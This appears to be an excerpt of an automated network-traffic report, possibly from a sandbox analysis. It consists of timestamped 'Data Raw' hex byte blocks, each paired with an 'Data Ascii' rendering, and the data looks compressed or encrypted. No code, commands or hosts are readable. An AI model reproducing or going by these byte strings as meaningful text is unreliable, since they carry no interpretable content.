                                                                                                                                                                                2021-11-11 11:27:09 UTC12377INData Raw: 61 0c 1a dc fd 9d c6 d6 c7 89 9b 50 04 6a f6 ef e3 6e 0f 55 b6 3d 00 b3 47 58 74 77 07 ab b7 42 bb 30 be 06 bc 5f 08 e6 9d 0b 86 78 06 0c 27 ee 3a d4 f9 fb 71 f2 a3 63 83 14 c9 b5 26 78 18 64 27 d6 1c dc 80 5f fd b8 2d 3d 40 06 c5 cf e7 cd 3c 00 5c 5b 46 ae 49 15 c3 ca 98 5a 2d b4 de 52 9e 27 7e 64 79 82 e4 28 37 ca 04 a7 d1 52 62 98 84 d9 4c 9c 38 21 30 04 69 52 d3 64 fc 0c ac d0 49 c5 16 3c 6b 02 14 d6 49 8e b7 68 17 ab 9c d4 22 01 4d d9 50 b3 3f 73 a9 20 04 b7 18 4a 52 81 30 96 fb 26 1a 42 78 0c b8 5d e0 c7 f2 55 4c 59 42 31 09 46 50 43 c3 00 bf 31 62 c3 51 3c 68 a1 27 c4 3a d1 eb 0e 06 17 f3 40 9f da 8a 42 05 1e 06 ed 03 98 10 28 27 4e 92 06 7e 1f 7b 56 00 b9 60 f1 1b fc e8 29 1c 1c aa 2c 5d 80 c8 6f ca 5e a6 2a 0c dd 69 d7 79 a0 3f 06 31 dc 6c 6e 4e
                                                                                                                                                                                Data Ascii: aPjnU=GXtwB0_x':qc&xd'_-=@<\[FIZ-R'~dy(7RbL8!0iRdI<kIh"MP?s JR0&Bx]ULYB1FPC1bQ<h':@B('N~{V`),]o^*iy?1lnN
                                                                                                                                                                                2021-11-11 11:27:09 UTC12385INData Raw: 15 3b d0 14 33 62 b0 00 da e2 7a 42 1a 97 a1 18 1f 0e d4 20 a9 f2 9a 5a 00 74 c3 2a 24 ce 59 2d a6 e4 09 00 13 bd 23 a4 eb 5b b5 74 12 66 4e a7 fd d4 40 92 fd 65 c6 40 90 ba 60 0c 68 93 1f 00 63 a0 9e fe be d4 53 2e 0e 31 82 24 52 77 96 b7 30 01 e1 66 eb 32 34 07 7a 34 c2 2f 6c 12 24 80 99 01 10 45 d1 d9 63 d4 27 38 7c b3 77 e8 d9 33 fe 97 cc 88 04 67 7b e2 c2 02 fb 80 8a 87 f9 6d 62 24 a4 64 3a ff 66 0f ba c4 fd ee f0 28 b7 5b d2 00 c7 5c dc 3e 92 84 80 6c ca c6 f4 9c f9 78 0c 75 86 bf 9b 7c 3e 12 5b ab 32 91 70 c2 bc 2a 91 68 20 d0 40 dc d7 03 6e 5b 79 a4 d4 fd 2d 85 a0 c1 50 66 fa 80 b2 19 4c 05 6e 98 12 26 0a 9f 8c 80 a0 7c 7e 62 8b a7 63 7d 14 d3 17 06 b4 47 4f 4b 42 44 71 a4 97 74 01 4c ac 3e 40 e0 ef 04 03 26 22 8d c2 ec 88 b2 e3 61 ac 88 4a b4 74
                                                                                                                                                                                Data Ascii: ;3bzB Zt*$Y-#[tfN@e@`hcS.1$Rw0f24z4/l$Ec'8|w3g{mb$d:f([\>lxu|>[2p*h @n[y-PfLn&|~bc}GOKBDqtL>@&"aJt
                                                                                                                                                                                2021-11-11 11:27:09 UTC12401INData Raw: 31 ae 05 3e 83 d8 72 c2 3d 94 d8 00 81 9c ab 74 5b 89 24 b3 34 10 86 83 69 c0 a6 ae 82 c5 62 a3 9d 56 9b db a2 ba 01 aa 25 fc 12 b9 1e b7 3e 94 30 9a bc 28 9b 37 ff b7 b1 94 d1 c2 33 c0 de 39 d6 03 18 ce 91 85 22 0c 4e 18 bc f4 88 20 b4 36 eb dc f4 e9 80 9d d0 84 e0 22 80 6d a8 25 09 82 42 1c df 30 96 19 73 c7 2a a0 52 e1 12 35 f8 af 66 56 02 47 16 d8 17 8a e9 e1 1f b0 41 a8 da 4a d6 a3 30 1e 66 95 98 19 60 b1 ff fe 71 99 4c 42 5c ae 52 ac 08 52 4d e9 29 13 aa be 21 26 bb 48 32 d9 01 19 20 59 28 3f a8 f7 00 46 d5 5f 6c a0 84 92 01 48 bd fa 98 b0 ea f6 03 80 fa 33 f2 f5 0b 32 30 cb e8 18 fe 00 06 ba 72 30 0d 1e 8e bf ce 5e 3e 81 0d a7 8a d4 fd d2 5e a4 5e 4f 6d a1 1c 6f b8 fd e1 cf 57 7c 18 c5 c6 d5 ae de d0 70 0c b2 88 18 63 0c b0 0b ee 12 65 51 f8 62 e6
                                                                                                                                                                                Data Ascii: 1>r=t[$4ibV%>0(739"N 6"m%B0s*R5fVGAJ0f`qLB\RRM)!&H2 Y(?F_lH320r0^>^^OmoW|pceQb
                                                                                                                                                                                2021-11-11 11:27:09 UTC12413INData Raw: 23 11 ce 3d 0e f1 4f fa 2d 0b 7a e9 00 5e 17 db bd 8a 06 fb d9 7e 7f 38 4b 1c ee 8b fc cf 49 8a f3 1f 30 36 be d3 96 5b 46 98 1b 74 81 5e 40 63 68 ac 9e 3a f6 7e 93 ce 34 13 3e ba 9a 00 5e 0b 69 df 57 ce 6e 9d 77 95 6f a7 f3 bb 5a f3 6d a1 8a d0 68 26 17 85 fe 7f ca b0 07 e1 6c 7e 6f 50 13 57 1f 76 9f f4 0d 54 9d ff 9f 3b b2 41 58 fd 17 58 2f 20 b2 68 fa 86 d3 4a 6f be cb 54 68 a5 84 98 fe 06 f7 5e b5 94 f2 20 e4 87 3a 9e a0 00 5b a5 b6 92 68 14 9c 1e 30 42 6d 67 df 90 39 ee 8f c4 10 10 f0 ba cc 12 5f 12 04 c9 66 21 8e 81 96 3c 2a c1 fa 16 98 66 3b 9c 57 be 13 c2 44 03 bd 13 cf 0c 85 9a 67 e7 44 07 1c c3 a6 9e c9 7f d9 14 bb 4a af 8b fb 3e e8 13 b8 a6 e9 7f cd 1a 12 e9 52 ec b6 ea 31 f4 37 18 9b 50 07 30 1f 0b 6d 79 40 73 45 13 d5 97 06 bd 7f c7 9c 17 d2
                                                                                                                                                                                Data Ascii: #=O-z^~8KI06[Ft^@ch:~4>^iWnwoZmh&l~oPWvT;AXX/ hJoTh^ :[h0Bmg9_f!<*f;WDgDJ>R17P0my@sE
                                                                                                                                                                                2021-11-11 11:27:09 UTC12429INData Raw: 45 4e 55 6d 7b 00 6a e8 ff 5f bd f3 7b 28 13 c7 90 7e fd f4 29 b5 65 9d 34 df 80 91 64 13 27 2f e9 22 f9 15 cf ac a9 1b 68 12 07 fb bf fc e3 2f 04 fb 39 8a e9 de 8f 94 50 4c 02 55 9b df 5e 44 dc e3 6b df 1a cd fd 65 c3 c5 05 17 25 b3 2e d1 ff 04 96 71 fb 3a 9d 0f 7f 39 f6 d9 eb 41 18 e9 1d 27 43 13 55 51 ed 87 3f 80 14 b3 7f a1 79 51 c5 08 7b e2 ed 7d c1 2b fa 82 57 5b 6a 2d be 01 0e e9 ca ba 6d 92 c1 48 4b 23 96 f9 af fa 55 c7 4f ad 81 d2 96 b1 d3 6b cf 74 28 35 10 b5 c6 fc b7 20 e5 29 f1 f3 2d bd 14 7d 9f d9 33 7a de f1 52 05 2a 53 ec 1a 09 70 37 4f d4 4e 49 f6 cd 49 f5 f1 6d a0 15 9d 9a f9 c4 e7 b5 16 3a 42 04 73 4e 85 e4 30 e9 5a 51 d8 db 50 13 b3 d7 61 69 9a 27 57 41 17 d0 57 bf 09 75 a1 b5 7f 7e 56 52 57 71 3e f1 2d 44 26 aa 27 5f 51 68 88 fb 2b c1
                                                                                                                                                                                Data Ascii: ENUm{j_{(~)e4d'/"h/9PLU^Dke%.q:9A'CUQ?yQ{}+W[j-mHK#UOkt(5 )-}3zR*Sp7ONIIm:BsN0ZQPai'WAWu~VRWq>-D&'_Qh+
                                                                                                                                                                                2021-11-11 11:27:09 UTC12445INData Raw: d5 ae 6b 0f 55 1d 32 ad 62 8a 57 66 90 09 74 44 f7 7d fd 25 30 e9 52 09 ae 09 f5 ca 69 e9 20 e9 5a 81 2a 68 14 9a b5 2f d4 cb 3a 98 92 97 4f c0 2d 65 55 44 33 1d 1b 31 09 4b 10 a6 bf e0 68 52 4c 98 fc e7 16 c8 4d ed fd 4a 74 c5 98 fd e9 27 e2 cf 68 1a 6f 58 4e b5 bf 70 b6 f5 83 20 88 70 d4 20 d7 69 28 93 98 12 2c b3 80 a7 00 88 b8 ad 81 38 70 00 1b e9 a1 31 5b 14 51 bf e6 bd f9 c0 ac 40 4e 42 a0 59 67 0f a3 0b 6c 33 b3 02 35 43 1a 02 ee e5 c0 58 3f b3 1d 13 40 e0 ab 0b cf c0 64 32 58 51 17 6d 29 02 98 81 ed 04 9b f2 fd f5 86 ec 1a 87 d4 4d 39 44 fa 05 21 1a 47 f7 68 91 cc a0 dc a7 f9 f5 b8 b1 0c af 29 42 4b 8f 42 57 e8 52 0c 08 6d 49 2e 5e 0a 26 11 12 0c a7 af 74 6b 1e 7f ea 44 00 a6 6e 2d 75 4a 42 1f 0f da 99 13 df 01 8a 71 35 ef 1c 84 b0 98 2c 17 81 25
                                                                                                                                                                                Data Ascii: kU2bWftD}%0Ri Z*h/:O-eUD31KhRLMJt'hoXNp p i(,8p1[Q@NBYgl35CX?@d2XQm)M9D!Gh)BKBWRmI.^&tkDn-uJBq5,%
                                                                                                                                                                                2021-11-11 11:27:09 UTC12461INData Raw: de 58 50 88 79 d7 20 9d c4 f4 75 0a 5b f9 fc 80 a0 45 14 58 b4 94 86 7b 78 06 24 21 fa a9 17 33 f0 d2 a2 67 b4 ec 1b e3 0e be 00 20 b1 66 31 92 e9 91 3a 05 2e 0a 88 d2 9a ef d0 9c 5c 76 b5 e2 7c 40 72 1e 96 8c 00 b4 55 63 36 0e db 2d 8f bb c8 42 bf ae 4f 74 e0 3e 4a 7a 19 0b 57 c0 38 b9 75 e7 6e 83 9a 6a ea 4d 01 c8 bc 67 31 6b f2 3d 8b b4 aa f1 32 22 68 2c c2 42 4a 49 dd 4c bf 40 5b c0 d4 2f b2 d6 40 fd 67 01 83 1e bc 4c 7a 9b 73 6f a2 42 18 a6 76 82 f4 ec 4a ff ff 9d 83 98 1c 10 d8 3c 8a c4 60 e1 75 bb 10 a4 15 d8 0c 40 39 29 77 46 d2 47 ea a8 40 0c 7a 53 33 80 fd f7 4d fe f4 18 60 64 f0 f4 93 00 7e 7f 85 25 ec 67 4a 30 07 d7 5f cd c2 60 19 5f 2b 5e 79 42 8e b2 15 17 fe 26 cc 5c 5a 1f c0 c0 af a6 a4 58 db fa 94 cc 27 bb 00 04 9c 47 ec 7d 2d b9 13 40 1a
                                                                                                                                                                                Data Ascii: XPy u[EX{x$!3g f1:.\v|@rUc6-BOt>JzW8unjMg1k=2"h,BJIL@[/@gLzsoBvJ<`u@9)wFG@zS3M`d~%gJ0_`_+^yB&\ZX'G}-@
                                                                                                                                                                                2021-11-11 11:27:09 UTC12465INData Raw: a8 94 28 e1 0a 0c 05 aa 13 9a 8e 2b d0 3e a7 68 93 c1 34 bd 3a 75 45 20 3c 11 09 a1 d6 64 9f df 02 f6 44 ff 32 75 ae 34 02 05 54 79 80 da 83 72 b7 34 31 07 5d 1c 7e f1 3a 76 92 28 0c 71 1a e0 0f 0c 18 02 42 cf 6b d0 84 58 df b4 e0 0d 0c 40 a0 08 a8 c0 dc 20 3d 53 5d 5a b1 5e 2f 28 3e a3 06 fb dd cd ed 28 40 2d 38 6a 18 10 a4 24 1d 1a 58 63 7a 00 68 b3 3f 90 19 c3 dd 04 66 4c fc 67 02 fe 60 2c 54 95 05 41 e0 8c ac dc a4 78 de 2f 16 ea e1 10 f9 3b ba 2c b8 32 13 01 c0 af f9 5c d2 b0 88 97 9c 74 bd 2f df 23 da ae 93 12 30 bf 19 e9 ac 06 ea 90 e0 cc 18 a1 14 48 10 96 ca ac e7 2a e7 ec 03 34 b9 5a 7f f0 8e ac 12 43 09 a0 c2 d8 90 43 76 06 29 b3 96 74 12 18 2d 62 97 c4 5c 60 ca ac 37 8a 39 84 61 04 f5 50 a9 73 78 fa 17 b7 ea bd 10 c6 48 c8 28 00 d5 46 3a 22 28
                                                                                                                                                                                Data Ascii: (+>h4:uE <dD2u4Tyr41]~:v(qBkX@ =S]Z^/(>(@-8j$Xczh?fLg`,TAx/;,2\t/#0H*4ZCCv)t-b\`79aPsxH(F:"(
                                                                                                                                                                                2021-11-11 11:27:09 UTC12481INData Raw: 58 c0 bf c8 25 0d f5 8e 84 a0 58 17 ef 9c 6c f0 18 08 7d 3d 40 5a 8c 58 5f 04 32 38 1c 92 9b 1a 60 48 80 f1 e2 e5 13 c0 78 de 76 a7 30 f7 5a 81 c1 f6 1d 02 c2 54 92 e0 a4 67 d4 7b c1 0c 76 c8 84 15 b1 fe 78 79 62 2f 9d 06 3a eb 74 71 af f9 68 0e b7 41 03 05 0d e1 a8 e4 0c 09 8b 42 6c b6 04 05 ff 1f 1c f4 81 86 c0 46 2e 9d 80 40 4a e8 8f f9 60 77 0c 6a f8 ec 20 31 9a 36 f8 5e 69 09 2a 52 ee f0 38 d7 06 a6 47 51 23 ac 56 00 3b de 71 0d d8 ba 9a 91 c0 26 38 94 60 29 ad 24 17 a3 1e 00 5a be 3b d1 3e f6 31 56 27 50 88 d2 83 42 a0 14 b3 1a 02 6c 1d a5 70 46 ff 77 fe 27 60 b2 3e 3d 21 07 d1 aa 0b ae 06 11 7d 32 a4 74 0c 83 18 e9 e0 57 bc c6 f6 a0 b2 99 b9 03 5d cf ce 3a a2 56 06 28 65 1a 2c 3e a6 25 90 c1 dd 3c 34 18 2b b8 04 15 d0 ae 79 a5 c1 94 0e e1 f6 83 6f
                                                                                                                                                                                Data Ascii: X%Xl}=@ZX_28`Hxv0ZTg{vxyb/:tqhABlF.@J`wj 16^i*R8GQ#V;q&8`)$Z;>1V'PBlpFw'`>=!}2tW]:V(e,>%<4+yo
                                                                                                                                                                                2021-11-11 11:27:09 UTC12497INData Raw: 20 cb 4e d9 a8 b6 e4 ed 0c 1d 78 ed 27 d5 1e e4 09 92 13 b7 1b 75 cd 8d c9 d7 1f 83 a7 5e 0c 5c 4b 57 aa 79 44 71 19 2f ab 2f a0 5b db 60 5a bf 6a fa 4c d1 81 18 2f ef 7d 2f 7c 5e 90 13 87 fd 7b af 2f e3 93 be b3 aa b0 c2 90 7f b0 22 de 7f 42 14 69 37 6b 7d a5 2c 5e 8b b5 3a 4c c0 17 06 dc da 16 23 2b 60 ea c5 4b 3d 81 c1 26 03 6d 09 04 0a 3b 98 25 04 49 ef ed 13 17 d8 53 90 35 76 19 34 40 36 cd 97 64 91 18 de ec 28 25 91 f1 75 4b 80 2b c3 99 31 04 e2 83 a3 41 b5 55 8b 7e 01 17 d0 00 86 0d 06 6b 76 90 7d 64 8f 36 23 69 44 9a 12 12 78 fd b0 67 7f f0 1e 71 3d 01 60 30 80 83 3e e6 97 2e f8 b3 81 a1 2c a0 01 08 7d 59 32 3b 25 14 52 53 3b 2a 60 13 be 62 b8 44 c0 cc 47 7c 41 d8 00 57 5c a3 9e 53 9d 96 5b 73 e0 12 54 38 62 d1 46 f3 3a c0 ba 01 97 b0 84 f9 c2 25
                                                                                                                                                                                Data Ascii: Nx'u^\KWyDq//[`ZjL/}/|^{/"Bi7k},^:L#+`K=&m;%IS5v4@6d(%uK+1AU~kv}d6#iDxgq=`0>.,}Y2;%RS;*`bDG|AW\S[sT8bF:%
                                                                                                                                                                                2021-11-11 11:27:09 UTC12513INData Raw: 20 1e e3 28 c5 ce b8 0c e8 94 ed 14 90 08 be 82 02 01 e1 96 90 81 ca 70 63 fe 64 5a 95 04 18 23 e3 26 9a 81 60 de f4 6e 90 54 4c 7f 2b 13 4f 86 0f d0 8c ea e7 f5 60 1b 5c cb 80 2c 25 28 cc b5 92 2d f4 36 1a 44 5e 50 89 11 ab 08 aa 82 01 3e d8 2f 08 31 3c 7c 2b e6 1a b0 0c 2f 38 63 b7 e5 10 04 14 6b 68 41 d2 41 35 4e 01 52 c5 08 7b 2d 37 40 64 f0 08 a9 7a c7 87 0c 68 b5 70 2d 18 7d 1b 85 14 2a 03 94 f2 6c a8 54 4f 07 d4 48 88 7d 8e 2d 9e 27 e3 7e aa c7 09 02 4e cf ae 00 e7 47 9a 6c c0 4c 97 0d 27 3c ad 92 7a 0f 36 1e a8 37 d2 ee 68 ec a4 10 37 0e 22 1e b1 a6 06 44 f5 11 f0 25 ca d3 1b f8 3e a4 38 0b 7f 49 f4 dd 66 d0 c7 50 4e f6 b9 f4 a3 c9 f5 fb b0 c3 e2 7c 12 08 a0 d7 ad 5e 4e 97 26 29 55 71 b3 d8 1a b7 80 d6 ea 47 fe c1 d9 1b 7b 5c 92 24 a6 13 cf b0 86
                                                                                                                                                                                Data Ascii: (pcdZ#&`nTL+O`\,%(-6D^P>/1<|+/8ckhAA5NR{-7@dzhp-}*lTOH}-'~NGlL'<z67h7"D%>8IfPN|^N&)UqG{\$
                                                                                                                                                                                2021-11-11 11:27:09 UTC12521INData Raw: 12 2e 09 4a f9 e2 0c 32 50 7c f1 10 03 9c e2 31 46 a9 99 f3 3b a8 57 18 a1 2d 1c 14 4e 9f 93 8c fc fe 30 b0 3d a4 33 06 d6 af 9c 93 ac 30 16 fd b0 66 ff 28 ee cc 22 f0 48 08 a3 f4 5a 1f 0a 64 34 c2 43 ef fa 14 60 a1 b8 7a 82 65 ed 4d a7 08 a7 d0 4b 35 22 ef ce 50 81 84 cf 67 04 20 66 b9 08 14 c8 f1 fc 87 f7 05 04 29 0a 1a 12 8b 80 2c f0 0c 18 51 4c 77 18 41 c4 20 82 34 28 cb f1 f6 02 60 9a 81 f5 ee a0 80 b0 06 40 f7 47 02 1a 6a bb 63 ba 67 68 24 94 cf 00 ee 18 ab bd 7c cc 9e 25 05 57 41 2d 5d 63 01 ec 4c e7 19 23 24 b8 0d 1c 8f 77 3c a5 d9 fc e8 b8 02 7b 86 ba 69 87 fa 62 d3 f7 59 d7 8d e0 20 3a fe 95 b2 00 48 b2 aa 32 60 79 0c 05 9c 81 36 5a 54 af 2d 58 a8 7c ce 0c 2f d1 6f 20 74 d0 06 64 28 69 df bc 1c 25 ca 0e 7b 7e b1 90 f6 32 8b fc cc ed 0a 50 dd 69
                                                                                                                                                                                Data Ascii: .J2P|1F;W-N0=30f("HZd4C`zeMK5"Pg f),QLwA 4(`@Gjcgh$|%WA-]cL#$w<{ibY :H2`y6ZT-X|/o td(i%{~2Pi
                                                                                                                                                                                2021-11-11 11:27:09 UTC12529INData Raw: 00 b3 5b 4f 4b 41 13 b2 40 5e e0 7c 79 28 02 18 62 b0 8c 68 0f 18 90 08 f6 74 01 23 52 2f 2c f4 7b fd 1e 61 80 51 6a f3 2f ed 44 c2 76 20 d1 20 03 02 08 62 80 e4 2e bd 11 9c b5 32 8c 1e 75 c4 10 6a a1 86 f3 62 70 04 5d 57 de 7c 04 da 47 b4 0c 22 25 0d a3 44 a2 20 86 2d 78 03 35 0a 72 28 00 04 8f aa 06 12 f0 ff 3a a2 f0 cf e0 84 36 97 ee a2 ec 82 35 1f 29 b8 50 47 24 44 28 70 f0 2a 40 39 6e 50 e8 74 21 4c 20 1a 0f 91 eb c3 78 58 98 ed c1 20 dd 09 c5 cf 3b f8 7c 62 3c a8 4f 78 64 bd f4 58 60 ab fe 86 2f 25 1e f3 55 1c 4f 4f ec b0 fc 3f 50 12 6c be 4f 16 f2 9a c1 97 d5 d8 18 69 48 c0 4b 34 b6 16 c0 b5 80 7a b1 d4 38 76 c6 2a 77 a2 24 30 7a 25 38 20 06 ad 9d 93 fa 00 24 0f f6 9d 4c fe 26 43 75 8f 01 6e e4 04 e9 b1 57 64 28 70 c1 52 c6 a1 e1 10 01 4a d2 81 34
                                                                                                                                                                                Data Ascii: [OKA@^|y(bht#R/,{aQj/Dv b.2ujbp]W|G"%D -x5r(:65)PG$D(p*@9nPt!L xX ;|b<OxdX`/%UOO?PlOiHK4z8v*w$0z%8 $L&CunWd(pRJ4
                                                                                                                                                                                2021-11-11 11:27:09 UTC12545INData Raw: 77 49 32 7d 61 a9 85 2c 55 04 7d bd 42 43 f9 25 12 76 bb ea 17 61 ff 31 69 ef e5 97 0c 35 80 f3 ce f8 94 06 7a 64 85 d5 27 1c 0c db c7 06 53 30 d3 9f 7c c5 89 14 04 10 de bb 6d 59 37 2e 34 26 22 d0 2e 5c c2 38 88 b1 80 20 59 05 28 9d 29 24 24 7b 2f e8 47 1b df cc 5f 24 c9 5e a9 4b 49 04 76 3b 00 66 43 c7 70 4c 13 1c 3a 76 b2 59 f8 b6 31 e9 53 80 30 1f 1b 80 71 92 1a 30 2b be 68 7e 58 52 38 81 2f cc 78 16 c5 a2 f4 fc e7 60 08 24 12 2d de b4 c0 88 27 d4 b9 10 02 0e dd c3 3f 7d 63 3c 6c 60 90 1a 2e 40 13 64 3b 07 e4 25 be 44 29 44 1c 7d 15 16 43 55 f5 93 2e 00 24 dd 0c 9e 5c 40 3e 51 0b 1e 78 17 d8 54 ad 05 36 44 11 ac 0d 0f 2f a8 a7 25 fe 38 ff 6c 99 cc 1b ea 6c 27 0c a0 12 76 1f 28 21 ab ee 17 f1 df fd a6 31 60 68 a9 a3 cf 71 c0 a8 06 2e 1e 37 10 97 05 75
                                                                                                                                                                                Data Ascii: wI2}a,U}BC%va1i5zd'S0|mY7.4&".\8 Y()$${/G_$^KIv;fCpL:vY1S0q0+h~XR8/x`$-'?}c<l`.@d;%D)D}CU.$\@>QxT6D/%8ll'v(!1`hq.7u
                                                                                                                                                                                2021-11-11 11:27:09 UTC12557INData Raw: 1f 1e 7d db c7 90 bc 35 84 55 68 8a e6 06 a1 17 f8 71 74 02 8f 97 bd 4f 9a 86 50 e4 5e 16 49 a6 4c 98 76 a1 9a 4e 87 00 a4 b2 5f fd 2e 4b 6f 3a 1c 09 ff f5 cc 52 7f ba e2 b5 c2 14 7e f2 99 50 7c 27 9a 8a 59 1e 10 f7 81 3f 25 12 5e 00 81 d4 fe 89 bf 21 23 3f d9 8a 3f e3 d2 63 18 d7 51 cf 01 57 fc 9e e2 00 ad 20 62 22 00 75 82 bd 9b 18 04 03 e4 c1 1c dc 7b 44 09 8a 6c c6 66 48 04 8a 2b d1 41 95 2f b4 16 04 c8 48 df 09 0f 82 26 28 6c 28 5f e4 b8 2e 98 1c f1 e5 4a ff af cd 3e 87 04 24 f5 80 9c 54 ee 50 bc 3c 1c 71 79 88 66 c6 79 02 80 e8 27 a4 84 28 58 85 b6 4b 5d ec dd e3 d0 e0 42 1b fe b3 c6 ad 56 f2 1f 6d f8 2a 06 48 80 aa 8b 3f a0 9c f7 23 bd 48 8e cd cb ce 44 b8 46 d5 34 88 2f 89 85 d1 ca b4 3c 87 f0 fb 61 de 48 2c 98 81 83 46 57 bc 01 dc 77 8b 78 07 49
                                                                                                                                                                                Data Ascii: }5UhqtOP^ILvN_.Ko:R~P|'Y?%^!#??cQW b"u{DlfH+A/H&(l(_.J>$TP<qyfy'(XK]BVm*H?#HDF4/<aH,FWwxI
                                                                                                                                                                                2021-11-11 11:27:09 UTC12573INData Raw: 2f 05 16 19 53 61 9a b1 fd 26 8a 0b 78 28 02 f5 1c 3f ed c2 10 09 3c 97 7c a0 c6 80 3d 4b ad be 3d be 89 28 20 a6 fb 8c a5 f6 6a 79 fe f0 2a 09 bf f3 d9 80 91 c7 1d d8 d0 5f c2 74 3e a3 da 48 1e e7 40 c6 24 ae b1 38 38 61 50 83 7a 31 c2 fe 85 4b 44 fd 7c b1 34 11 21 fe 81 14 8b 93 06 03 9a 6a 02 59 e8 07 c5 f6 d6 13 4f 82 bc 0c 50 15 68 fd dc 92 6c 24 6f 67 e2 38 15 e7 68 07 31 0c 08 a9 b8 70 e1 60 be c7 ca 0d dc 08 98 31 25 7a 6b d9 3c 1c 67 5e 26 c8 c2 67 e0 00 98 61 a5 b6 00 ec 33 41 93 9c 40 3a 7a 70 04 09 32 63 4e fd d8 4e 38 c0 03 04 f4 81 e5 ce 80 3a 9e 31 d2 92 8a 0b fa ee 4f 13 a5 72 83 f4 dc bb 4c 6d 36 84 cc f9 ba 25 ec 86 53 25 11 cd b1 20 13 4a 16 18 1c 24 f6 8c 44 04 19 22 4d a3 70 c4 20 36 3e 11 15 75 02 27 7b 40 06 f2 f0 0f ba 2f d5 2d 40
                                                                                                                                                                                Data Ascii: /Sa&x(?<|=K=( jy*_t>H@$88aPz1KD|4!jYOPhl$og8h1p`1%zk<g^&ga3A@:zp2cNN8:1OrLm6%S% J$D"Mp 6>u'{@/-@
                                                                                                                                                                                2021-11-11 11:27:09 UTC12589INData Raw: 3a a5 14 e8 16 05 25 f3 85 f9 18 b0 12 a9 01 09 8a d4 9c 79 2a ca 84 28 7c 81 9f c0 ca 4b 53 97 9d 3e 90 75 c1 80 2a 41 23 fb ff c9 dc 24 a5 e7 dc 92 35 f0 a0 f3 7d 62 e1 da f5 4c 56 97 db 28 82 3f 44 04 6b 2b d6 06 41 19 4a 38 82 25 4d cc 59 7b 02 0e d1 08 e4 0b 11 6f 10 5e 32 47 28 5a 71 a8 05 ac 8c b7 52 ca bb 81 a8 0b d2 6f ac 99 a0 2d b3 19 60 29 40 88 9e c0 52 31 cd 33 20 7c cf 3a a9 5e 8e 93 60 9d 5d 52 c1 17 4e ad c8 bc e8 9f 30 00 be 06 2d 37 77 65 ce 2f 5d 16 f1 50 bf 19 41 f2 fc 5a 5f 88 e6 53 ba 66 00 db aa ef 67 58 68 4e 0e 2d 5f 6a 44 5e 82 0f 7e 5e 69 7d 51 c6 70 e9 97 9e b2 82 35 be af 5f 38 11 1e 12 cf 0e 5a e4 a9 93 a2 b2 fc b0 26 c3 06 f9 da 1d 0e 0c ea 7c ee e7 1c c1 ee 07 c6 08 e2 06 11 60 04 26 c2 99 5d ce bf 85 c3 d2 c9 a1 2b fb 2f
                                                                                                                                                                                Data Ascii: :%y*(|KS>u*A#$5}bLV(?Dk+AJ8%MY{o^2G(ZqRo-`)@R13 |:^`]RN0-7we/]PAZ_SfgXhN-_jD^~^i}Qp5_8Z&|`&]+/
                                                                                                                                                                                2021-11-11 11:27:09 UTC12605INData Raw: 63 29 4a 35 e0 6c f9 00 62 69 d5 43 58 2c 05 0a 16 b9 44 a4 06 c7 67 e6 90 4a 85 b8 f0 02 f4 fb 70 d4 4f 7f 44 d2 02 13 8f 69 16 18 52 61 24 c8 6c a6 0f cf 14 6a 77 d1 c8 c0 fe 00 2c 0a 39 ff 7f ad fe 9d 05 20 c5 fe 06 0c 95 fd c0 a0 92 da 17 b6 62 8b 5e 85 7e f8 3d df ee 23 76 6c 2d 19 7b 57 a2 7a fa d4 1c 7c 86 25 44 fe 57 30 88 b9 bd 32 f9 28 68 2a d4 46 03 81 7a 4f 8a 00 3c c0 e4 38 52 a7 ae e9 01 7d dd a3 32 4a ee 3a 34 6b 36 75 1a 5e 3c c1 2d c3 ec 6a cc cc 9f f3 7f 8b 50 07 e3 01 22 51 08 ee 03 17 ce d7 00 10 19 0a 97 69 10 20 94 18 12 21 f5 64 3e 02 b5 c6 2a 98 1c 3f 63 c1 68 11 f2 1b 28 51 3e 28 9b ce 8d e0 84 04 2f 28 02 e8 d0 92 d6 b8 3c 7d a7 93 98 2a 24 4e e7 58 dd 04 f1 4c 07 3a 66 ce 3e c6 5c 1c ea 00 ed c7 1a 0d 35 f1 79 01 c6 6d 2a 1c 0c
                                                                                                                                                                                Data Ascii: c)J5lbiCX,DgJpODiRa$ljw,9 b^~=#vl-{Wz|%DW02(h*FzO<8R}2J:4k6u^<-jP"Qi !d>*?ch(Q>(/(<}*$NXL:f>\5ym*
                                                                                                                                                                                2021-11-11 11:27:09 UTC12621INData Raw: 9e b5 d6 13 23 7a 09 02 09 64 42 77 80 bd f6 e1 71 db 05 15 05 36 27 be 81 16 55 85 6f 91 f5 f8 f1 20 db 4f 02 74 0f 84 ef ba d8 c1 73 d2 b0 85 16 5d c7 bb 81 a7 6c 67 04 77 5c 83 bd bb 5c 62 3f 2d aa 87 c7 80 c7 51 e6 10 19 5e 2f f0 9f ab 09 a9 92 66 d1 d4 ea 05 77 67 3c f7 20 28 e2 c0 b8 58 0c 3e 51 ed 45 24 cf 4b 66 ae c1 ac b8 77 7a 90 7a 90 ab a5 60 0b ce bb 62 02 41 31 e2 7c d6 f1 da ce 57 f6 b8 6c 5c 76 19 34 31 15 0c d4 ec 0b 75 fc 99 98 ae 25 cd 84 f4 18 e9 10 94 8b 4b 20 3b 49 26 df 5b b6 02 0f 4e 69 b4 da e2 0c 56 32 91 7e b4 9e 5e 6a f2 20 28 4a 6c 08 d3 75 18 59 0a 9c 65 7e 0c 74 fe a4 91 00 68 62 d5 5e 93 21 27 80 01 a0 24 a6 b7 f7 57 c7 e1 3f 42 ad 6c f5 e2 50 07 08 26 78 0d 7b 9c 6a 82 6c 1b 19 16 0b 02 6c 98 7e ca 89 af 77 52 2c 17 b9 32
                                                                                                                                                                                Data Ascii: #zdBwq6'Uo Ots]lgw\\b?-Q^/fwg< (X>QE$Kfwzz`bA1|Wl\v41u%K ;I&[NiV2~^j (JluYe~thb^!'$W?BlP&x{jll~wR,2
